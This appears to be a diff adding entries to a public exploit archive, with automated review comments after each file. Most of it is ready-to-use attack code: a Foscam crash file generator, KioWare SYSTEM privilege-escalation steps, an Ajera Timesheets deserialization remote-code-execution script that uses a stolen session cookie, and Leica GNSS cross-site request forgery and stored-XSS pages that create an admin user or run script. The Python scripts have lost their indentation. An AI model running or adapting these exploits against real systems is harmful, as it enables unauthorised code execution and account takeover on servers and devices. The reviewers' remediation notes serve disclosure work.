# 12.- Save
# 13.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 150
f = open ("FoscamVMS_1.1.4.9.txt", "w")
f.write(buffer)
f.close()
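
Review bot: Step 5 reads "Password ->" with nothing after it, so it is unclear whether the admin account was tested with an empty password or the value was omitted; say which, because an empty admin password would be a finding in its own right. The steps require logging in as admin and opening User Management Settings before the field is reachable, which should be stated as a precondition next to "Denial of Service (DoS) Local".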

@ -0,0 +1,71 @@
# Exploit Title : KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation
# Date : 10/12/2018
# Exploit Author : Hashim Jawad - @ihack4falafel
# Vendor Homepage : https://www.kioware.com/
# Tested on : Windows Server 2016 Standard (x64)
# CVE : CVE-2018-18435
Description:
============
KioWare Server version 4.9.6 and older installs by default to "C:\kioware_com" with weak folder permissions granting any user full permission "Everyone: (F)" to the contents of the directory and it's sub-folders. In addition, the program installs a service called "KWSService" which runs as "Localsystem", this will allow any user to escalate privileges to "NT AUTHORITY\SYSTEM" by substituting the service's binary with a malicious one.
Proof:
======
C:\>icacls c:\kioware_com
C:\kioware_com Everyone:(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(AD)
BUILTIN\Users:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
C:\>sc qc KWSService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: KWSService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\kioware_com\KWSS.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : KWS Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>icacls C:\kioware_com\KWSS.exe
C:\kioware_com\KWSS.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
WIN-ONKVVSNUHKV\test:(I)(F)
Successfully processed 1 files; Failed processing 0 files
C:\>
Exploit:
========
Simply replace "KWSS.exe" with your preferred payload and wait for execution upon reboot.
# Disclosure Timeline:
# ====================
# 10-13-18: Contacted vendor
# 10-15-18: Vendor requested full report and POC
# 10-15-18: Full report and POC sent
# 10-16-18: Vendor was able to reproduce/validate the issue and filed a feature request
# 10-16-18: Asked vendor to provide timeline for patch
# 10-16-18: Requested CVE ID
# 10-17-18: CVE-2018-18435 assigned
# 10-17-18: Vendor requested 90 days timeline to patch/QA test
# 12-20-18: Vendor sent patch and requested feedback
# 12-22-18: Suggestions/modifications sent to Vendor
# 12-24-18: Vendor sent new patch and requested feedback
# 12-25-18: New Suggestions/modifications sent to Vendor
# 12-26-18: Vendor sent new patch and requested feedback
# 12-27-18: Vendor was notified that the latest patch is sufficient
# 12-31-18: Vendor released new version (v4.9.9) and patch as well
# 01-07-19: Vulnerability has been made public
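
Review bot: The entry has no remediation section even though the timeline shows a fix exists ("Vendor released new version (v4.9.9)" on 12-31-18). Add a Solution line with that version and, for hosts that cannot upgrade yet, the interim step of tightening the ACL on C:\kioware_com so that the "Everyone:(OI)(CI)(F)" entry shown in the icacls output is gone and non-administrative users cannot modify KWSS.exe. The header date is written "10/12/2018" and the timeline uses "10-13-18"; use one unambiguous format throughout.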

@ -0,0 +1,60 @@
# Exploit Title: Ajera Timesheets <= 9.10.16 - Deserialization of untrusted data
# Date: 2019-01-03
# Exploit Author: Anthony Cole
# Vendor Homepage: https://www.deltek.com/en/products/project-erp/ajera
# Version: <= 9.10.16
# Contact: http://twitter.com/acole76
# Website: http://twitter.com/acole76
# Tested on: Windows 2012
# CVE: CVE-2018-20221
# Category: webapps
#
# Ajera is a software written in .NET by Deltek. Version <= 9.10.16 allows an attacker to cause the software to deserialize untrusted data that can result in remote code execution.
# Secure/SAService.rem in Deltek Ajera Timesheets <= 9.10.16 are vulnerable to remote code execution via deserialization of untrusted user input from an authenticated user. The executed code will run as the IIS Application Pool that is running the application.
#
import struct, sys, requests, zlib, argparse, urlparse, subprocess
def run_command(command):
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output = b''
for line in iter(p.stdout.readline, b''):
output += line
return output
def isurl(urlstr):
try:
urlparse.urlparse(urlstr)
return urlstr
except:
raise argparse.ArgumentTypeError("invalid url")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Ajera .NET Remoting Exlpoit')
parser.add_argument("--url", "-u", type=isurl, required=True, help="the url of the target.")
parser.add_argument("--cmd", "-c", required=True, help="the command to execute")
parser.add_argument("--auth", "-a", required=True, help="the ASPXAUTH cookie")
parser.add_argument("--version", "-v", required=False, help="the version of Ajera Server. 8.9.9.0 => 8990", default="8990")
parser.add_argument("--ysoserial", "-y", required=True, help="the path to ysoserial.exe")
parser.add_argument("--proxy", "-p", type=isurl, required=False, help="ex: http://127.0.0.1:8080")
args = parser.parse_args()
url_parts = urlparse.urlparse(args.url)
target_url = "%s://%s" % (url_parts.scheme, url_parts.netloc)
proxies = {}
if(args.proxy != None):
proxy_parts = urlparse.urlparse(args.proxy)
proxies[proxy_parts.scheme] = "%s://%s" % (proxy_parts.scheme, proxy_parts.netloc)
cmd = "/c " + args.cmd
size = len(cmd)
serial_payload = run_command('%s -o raw -g TypeConfuseDelegate -f BinaryFormatter -c "%s"' % (args.ysoserial, args.cmd))
url = target_url + "/ajera/Secure/SAService.rem"
headers = {'Content-Type': 'application/octet-stream'}
cookies = {'.ASPXAUTH': args.auth}
payload = "\x04" + args.version + zlib.compress(serial_payload)
response = requests.post(url, headers=headers, cookies=cookies, data=payload, proxies=proxies, verify=False)
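Review bot: The header names the affected versions (`<= 9.10.16`) but gives no fixed version, vendor advisory or mitigation, so someone triaging CVE-2018-20221 cannot tell from this file what to upgrade to; a line for that would help. In the script body, `cmd` and `size` are assigned and never read, `struct` and `sys` are imported but unused, and `isurl` accepts almost any string because `urlparse.urlparse` rarely raises, while its bare `except` hides the cause when it does. `verify=False` sends the `.ASPXAUTH` cookie without certificate validation, which deserves at least a comment. The index row for this entry lists the file as `46086.txt` although it is a Python 2 script.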

@ -0,0 +1,58 @@
<--
Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 Cross-Site Request Forgery
Vendor: Leica Geosystems AG
Product web page: https://www.leica-geosystems.com
Affected version: 4.30.063
4.20.232
4.11.606
3.22.1818
3.10.1633
2.62.782
1.00.395
Summary: The Leica GR10 is the next generation GNSS reference station receiver
that combines the latest state-of-the-art technologies with a streamlined
'plug and play' workflow. Designed for a wide variety of GNSS reference station
applications, the Leica GR10 offers new levels of simplicity, reliability and
performance.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: BarracudaServer.com (WindowsCE)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5502
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5502.php
18.12.2018
-->
<html>
<body>
<form action="http://192.168.1.17/config/config_UserManagementPostBackHelper.lsp" method="POST">
<input type="hidden" name="txtHelpPage" value="config_changeuser" />
<input type="hidden" name="txtUsername" value="testingus" />
<input type="hidden" name="txtPassword" value="12345678" />
<input type="hidden" name="txtConfirmPassword" value="12345678" />
<input type="hidden" name="webRole" value="3" />
<input type="hidden" name="ftpRole" value="2" />
<input type="hidden" name="TxtOperationMode" value="2" />
<input type="hidden" name="txtEditedUser" value="" />
<input type="hidden" name="userId" value="nil" />
<input type="submit" value="Init" />
</form>
</body>
</html>
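Review bot: The header block opens with `<--` but closes with `-->`; an HTML comment has to open with `<!--`, so as written the advisory text is parsed as page content rather than as a comment. The description says requests are accepted without any validity check but records no vendor response or fixed firmware version for the seven listed releases; a status line would let operators of those versions know whether an update exists.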

@ -0,0 +1,83 @@
<--
Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 JS/HTML Code Injection
Vendor: Leica Geosystems AG
Product web page: https://www.leica-geosystems.com
Affected version: 4.30.063
4.20.232
4.11.606
3.22.1818
3.10.1633
2.62.782
1.00.395
Summary: The Leica GR10 is the next generation GNSS reference station receiver
that combines the latest state-of-the-art technologies with a streamlined
'plug and play' workflow. Designed for a wide variety of GNSS reference station
applications, the Leica GR10 offers new levels of simplicity, reliability and
performance.
Desc: The application suffers from a stored XSS vulnerability. The issue is
triggered via unrestricted file upload while restoring a config file allowing
the attacker to upload an html or javascript file that will be stored in
/settings/poc.html. This can be exploited to execute arbitrary HTML or JS
code in a user's browser session in context of an affected site.
Tested on: BarracudaServer.com (WindowsCE)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5503
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5503.php
Ref: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5502.php
18.12.2018
-->
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/192.168.1.17\/upload_config\/", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryKW8wlraBygxiEQyo");
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryKW8wlraBygxiEQyo\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"xss.html\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\n" +
"\x3chtml\x3e\r\n" +
"\x3chead\x3e\r\n" +
"\x3ctitle\x3eHTMLi\x3c/title\x3e\r\n" +
"\x3c/head\x3e\r\n" +
"\x3cbody\x3e\r\n" +
"\x3cscript\x3econfirm(document.cookie)\x3c/script\x3e\r\n" +
"\x3c/body\x3e\r\n" +
"\x3c/html\x3e\n" +
"\n" +
"\r\n" +
"------WebKitFormBoundaryKW8wlraBygxiEQyo--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Init" onclick="submitRequest();" />
</form>
</body>
</html>
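Review bot: The description says the uploaded file is stored at `/settings/poc.html`, but the request body sets `filename=\"xss.html\"`, so the text and the PoC disagree on the file name and one of them should be corrected. The header has the same `<--` opener as the CSRF file where `<!--` is needed. The description attributes the issue to unrestricted upload during config restore without saying whether the vendor has a fix, and a remediation or status line would make the entry usable for triage.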

@ -6234,6 +6234,10 @@ id,file,description,date,author,type,platform,port
46064,exploits/windows_x86-64/dos/46064.py,"NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC)",2019-01-02,"Luis Martínez",dos,windows_x86-64,
46071,exploits/multiple/dos/46071.html,"WebKit JSC - 'AbstractValue::set' Use-After-Free",2019-01-02,"Google Security Research",dos,multiple,
46072,exploits/multiple/dos/46072.js,"WebKit JSC - 'JSArray::shiftCountWithArrayStorage' Out-of-Bounds Read/Write",2019-01-02,"Google Security Research",dos,multiple,
46078,exploits/windows/dos/46078.html,"Microsoft Edge 44.17763.1.0 - NULL Pointer Dereference",2019-01-07,"Bogdan Kurinnoy",dos,windows,
46087,exploits/windows/dos/46087.py,"BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC)",2019-01-07,"Luis Martínez",dos,windows,
46088,exploits/windows/dos/46088.py,"SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC)",2019-01-07,"Luis Martínez",dos,windows,
46089,exploits/windows/dos/46089.py,"Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)",2019-01-07,"Luis Martínez",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10184,6 +10188,7 @@ id,file,description,date,author,type,platform,port
46056,exploits/windows_x86/local/46056.py,"MAGIX Music Editor 3.1 - Buffer Overflow (SEH)",2018-12-27,bzyo,local,windows_x86,
46058,exploits/windows_x86/local/46058.py,"Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)",2018-12-27,bzyo,local,windows_x86,
46059,exploits/windows_x86/local/46059.py,"Iperius Backup 5.8.1 - Buffer Overflow (SEH)",2018-12-27,bzyo,local,windows_x86,
46093,exploits/windows/local/46093.txt,"KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation",2019-01-07,"Hashim Jawad",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
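Review bot: The new 46093 row titles the product `KioWare Server Version 4.9.6`, where the neighbouring rows give the product name followed directly by the version number (`Iperius Backup 5.8.1`, `MAGIX Music Editor 3.1`). Dropping the word `Version` keeps titles consistent for anyone searching the index by product and version.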
@ -17051,6 +17056,7 @@ id,file,description,date,author,type,platform,port
46053,exploits/multiple/remote/46053.py,"Kubernetes - (Authenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,
46073,exploits/linux/remote/46073.rb,"Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)",2019-01-02,Metasploit,remote,linux,
46074,exploits/linux/remote/46074.rb,"Hashicorp Consul - Remote Command Execution via Services API (Metasploit)",2019-01-02,Metasploit,remote,linux,
46075,exploits/python/remote/46075.rb,"Mailcleaner - Authenticated Remote Code Execution (Metasploit)",2019-01-07,"Mehmet Ince",remote,python,443
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
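Review bot: The 46075 row carries no affected version in its description (`Mailcleaner - Authenticated Remote Code Execution (Metasploit)`), so the index entry cannot be matched against an installed release; adding the version range would fix that. The row also files a `.rb` module under `exploits/python/` with platform `python`, which is worth a check that the platform column is meant to describe the target and not the module's language.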
@ -40558,3 +40564,16 @@ id,file,description,date,author,type,platform,port
46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,80
46061,exploits/php/webapps/46061.txt,"WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload",2018-12-27,Kaimi,webapps,php,80
46065,exploits/php/webapps/46065.py,"Vtiger CRM 7.1.0 - Remote Code Execution",2019-01-02,AkkuS,webapps,php,
46076,exploits/php/webapps/46076.txt,"Embed Video Scripts - Persistent Cross-Site Scripting",2019-01-07,"Deyaa Muhammad",webapps,php,80
46077,exploits/php/webapps/46077.txt,"All in One Video Downloader 1.2 - Authenticated SQL Injection",2019-01-07,"Deyaa Muhammad",webapps,php,80
46079,exploits/php/webapps/46079.txt,"LayerBB 1.1.1 - Persistent Cross-Site Scripting",2019-01-07,0xB9,webapps,php,80
46080,exploits/php/webapps/46080.txt,"MyBB OUGC Awards Plugin 1.8.3 - Persistent Cross-Site Scripting",2019-01-07,0xB9,webapps,php,80
46081,exploits/cgi/webapps/46081.txt,"PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting",2019-01-07,"Kumar Saurav",webapps,cgi,80
46082,exploits/php/webapps/46082.txt,"phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting",2019-01-07,"Ozer Goker",webapps,php,80
46083,exploits/php/webapps/46083.txt,"Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation",2019-01-07,"Noman Riffat",webapps,php,80
46084,exploits/php/webapps/46084.txt,"MyT Project Management 1.5.1 - 'Charge[group_total]' SQL Injection",2019-01-07,"Mehmet Onder",webapps,php,80
46085,exploits/php/webapps/46085.txt,"Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal",2019-01-07,"Pongtorn Angsuchotmetee_ Vittawat Masaree",webapps,php,80
46086,exploits/windows/webapps/46086.txt,"Ajera Timesheets 9.10.16 - Deserialization of Untrusted Data",2019-01-07,"Anthony Cole",webapps,windows,
46090,exploits/windows/webapps/46090.html,"Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery",2019-01-07,LiquidWorm,webapps,windows,80
46091,exploits/windows/webapps/46091.html,"Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection",2019-01-07,LiquidWorm,webapps,windows,
46092,exploits/hardware/webapps/46092.py,"Huawei E5330 21.210.09.00.158 - Cross-Site Request Forgery (Send SMS)",2019-01-07,"Nathu Nandwani",webapps,hardware,
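Review bot: Row 46086 points at `46086.txt` although the Ajera file added in this commit is a Python script, so the extension in the path should match the content. Row 46083 spells `Wordpress` where the context row 46061 uses `WordPress`. The author field of 46085 joins two names with an underscore (`Angsuchotmetee_ Vittawat`), presumably standing in for a comma. Row 46091 leaves the port empty while 46090, for the same device's web interface, has `80`. Aligning these keeps lookups by product, author and port reliable.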
